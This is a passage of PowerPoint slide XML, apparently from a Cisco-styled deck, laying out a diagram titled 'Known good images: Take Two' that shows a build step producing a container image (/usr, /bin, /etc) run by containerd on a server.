          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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200">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>CONTAINERD</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA54E651-7262-CF41-94F3-2FE11457EEE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000926" y="4279456"/>
            <a:ext cx="1414533" cy="487490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>LOCATION B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774FA1B5-2BA1-DB45-94AB-500D17F946B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1832186" y="151165"/>
            <a:ext cx="5764376" cy="319204"/>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685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Known good images: Take Two</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4495559-9397-6F4C-B152-0E49CF0F1DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315640" y="470371"/>
            <a:ext cx="7648931" cy="314882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>           Things don’t change. New versions replace them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Elbow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CD5F76-29DA-5544-89C1-2BB878F6963D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2604015" y="3788419"/>
            <a:ext cx="240012" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Elbow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D76356-BB7F-3D4B-879D-53E622E471B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1391488" y="2027853"/>
            <a:ext cx="818136" cy="1846932"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06360BF-AA33-E446-9982-FD10C52265D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4019797" y="2686900"/>
            <a:ext cx="1389157" cy="308025"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container Image</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD9851F-E223-D849-A7E7-E1BC378D05BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964957" y="1775881"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A11FA26-1506-834C-AC1E-E95695B676A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4377610" y="2231389"/>
            <a:ext cx="682226"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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2594B10-E204-D44E-8A8E-0D0881538B81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492276" y="1775881"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25235C6-2A13-9044-ABC0-AE029CF536D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016685" y="1775881"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Elbow Connector 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B510A9A-1D5A-EF41-B231-772D3AED62E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="38" idx="0"/>
            <a:endCxn id="40" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4644224" y="2612403"/>
            <a:ext cx="144648" cy="4348"/>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ED4E15C7-6DCC-E64A-B87E-582F3615C215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="0"/>
            <a:endCxn id="39" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4381434" y="1894101"/>
            <a:ext cx="144647" cy="529933"/>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8" name="Elbow Connector 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6F84AD-B8F3-394B-A73F-2261C3A6A41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="0"/>
            <a:endCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4645094" y="2157759"/>
            <a:ext cx="144647" cy="2614"/>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0E2884DD-9536-8A45-AA60-B362AB1E8F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="0"/>
            <a:endCxn id="43" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4907298" y="1898168"/>
            <a:ext cx="144647" cy="521796"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Right Arrow 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9D1DC15-B99E-BA4E-9236-4AC8B41645A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1937839" y="1811204"/>
            <a:ext cx="1683692" cy="1055461"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514325"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>BUILD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E133333A-A7E7-3E48-A0C4-FCD868DB7C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3885190" y="1637875"/>
            <a:ext cx="1661834" cy="147459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endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D151BA6A-68A6-1E4D-924A-938B82C2D5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624709" y="3908425"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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200">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER X</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E164A9-EA70-3142-B404-C36C2BC5B38E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624711" y="3360388"/>
            <a:ext cx="2166965" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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200">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>CONTAINERD</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="Elbow Connector 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78235102-BC29-2E44-97BA-78B90CDE01E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="70" idx="0"/>
            <a:endCxn id="71" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6588186" y="3788419"/>
            <a:ext cx="240012" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
